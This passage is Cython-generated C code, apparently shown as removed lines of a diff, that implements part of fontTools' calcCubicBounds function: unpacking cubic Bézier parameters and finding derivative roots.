*__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - Py_ssize_t __pyx_t_11; - PyObject *(*__pyx_t_12)(PyObject *); - int __pyx_t_13; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicBounds", 1); - - /* "fontTools/misc/bezierTools.py":430 - * 35.566243 0.000000 64.433757 75.000000 - * """ - * (ax, ay), (bx, by), (cx, cy), (dx, dy) = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * # calc first derivative - * ax3 = ax * 3.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_7 = PyList_GET_ITEM(sequence, 0); - __pyx_t_9 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_7 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - index = 1; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ax = __pyx_t_7; - __pyx_t_7 = 0; - __pyx_v_ay = __pyx_t_9; - __pyx_t_9 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_9 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_9 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - index = 1; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_bx = __pyx_t_9; - __pyx_t_9 = 0; - __pyx_v_by = __pyx_t_7; - __pyx_t_7 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_5))) || (PyList_CheckExact(__pyx_t_5))) { - PyObject* sequence = __pyx_t_5; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_7 = PyList_GET_ITEM(sequence, 0); - __pyx_t_9 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_7 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - index = 1; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_cx = __pyx_t_7; - __pyx_t_7 = 0; - __pyx_v_cy = __pyx_t_9; - __pyx_t_9 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_6))) || (PyList_CheckExact(__pyx_t_6))) { - PyObject* sequence = __pyx_t_6; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_9 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_9 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_6); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - index = 1; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __pyx_v_dx = __pyx_t_9; - __pyx_t_9 = 0; - __pyx_v_dy = __pyx_t_7; - __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":432 - * (ax, ay), (bx, by), (cx, cy), (dx, dy) = calcCubicParameters(pt1, pt2, pt3, pt4) - * # calc first derivative - * ax3 = ax * 3.0 # <<<<<<<<<<<<<< - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ax, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 432, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":433 - * # calc first derivative - * ax3 = ax * 3.0 - * ay3 = ay * 3.0 # <<<<<<<<<<<<<< - * bx2 = bx * 2.0 - * by2 = by * 2.0 - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 433, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":434 - * ax3 = ax * 3.0 - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 # <<<<<<<<<<<<<< - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_bx, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 434, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_bx2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":435 - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 - * by2 = by * 2.0 # <<<<<<<<<<<<<< - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_by, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 435, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_by2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":436 - * bx2 = bx * 2.0 - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] # <<<<<<<<<<<<<< - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - * roots = xRoots + yRoots - */ - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_ax3, __pyx_v_bx2, __pyx_v_cx}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_6)) || PyTuple_CheckExact(__pyx_t_6)) { - __pyx_t_5 = __pyx_t_6; __Pyx_INCREF(__pyx_t_5); - __pyx_t_11 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_11 = -1; __pyx_t_5 = PyObject_GetIter(__pyx_t_6); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_5); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 436, __pyx_L15_error) - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_5))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyList_GET_ITEM(__pyx_t_5, __pyx_t_11); __Pyx_INCREF(__pyx_t_6); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyTuple_GET_ITEM(__pyx_t_5, __pyx_t_11); __Pyx_INCREF(__pyx_t_6); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } - } else { - __pyx_t_6 = __pyx_t_12(__pyx_t_5); - if (unlikely(!__pyx_t_6)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 436, __pyx_L15_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_6); - } - __Pyx_XDECREF_SET(__pyx_8genexpr1__pyx_v_t, __pyx_t_6); - __pyx_t_6 = 0; - __pyx_t_6 = PyObject_RichCompare(__pyx_int_0, __pyx_8genexpr1__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_6)) { - __Pyx_DECREF(__pyx_t_6); - __pyx_t_6 = PyObject_RichCompare(__pyx_8genexpr1__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - } - __pyx_t_13 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_13 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_13) { - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_8genexpr1__pyx_v_t))) __PYX_ERR(0, 436, __pyx_L15_error) - } - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); __pyx_8genexpr1__pyx_v_t = 0; - goto __pyx_L20_exit_scope; - __pyx_L15_error:; - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); __pyx_8genexpr1__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L20_exit_scope:; - } /* exit inner scope */ - __pyx_v_xRoots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":437 - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] # <<<<<<<<<<<<<< - * roots = xRoots + yRoots - * - */ - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_ay3, __pyx_v_by2, __pyx_v_cy}; - __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_5)) || PyTuple_CheckExact(__pyx_t_5)) { - __pyx_t_6 = __pyx_t_5; __Pyx_INCREF(__pyx_t_6); - __pyx_t_11 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_11 = -1; __pyx_t_6 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 437, __pyx_L23_error) - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_6))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyList_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - } - } else { - __pyx_t_5 = __pyx_t_12(__pyx_t_6); - if (unlikely(!__pyx_t_5)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 437, __pyx_L23_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_5); - } - __Pyx_XDECREF_SET(__pyx_8genexpr2__pyx_v_t, __pyx_t_5); - __pyx_t_5 = 0; - __pyx_t_5 = PyObject_RichCompare(__pyx_int_0, __pyx_8genexpr2__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_5)) { - __Pyx_DECREF(__pyx_t_5); - __pyx_t_5 = 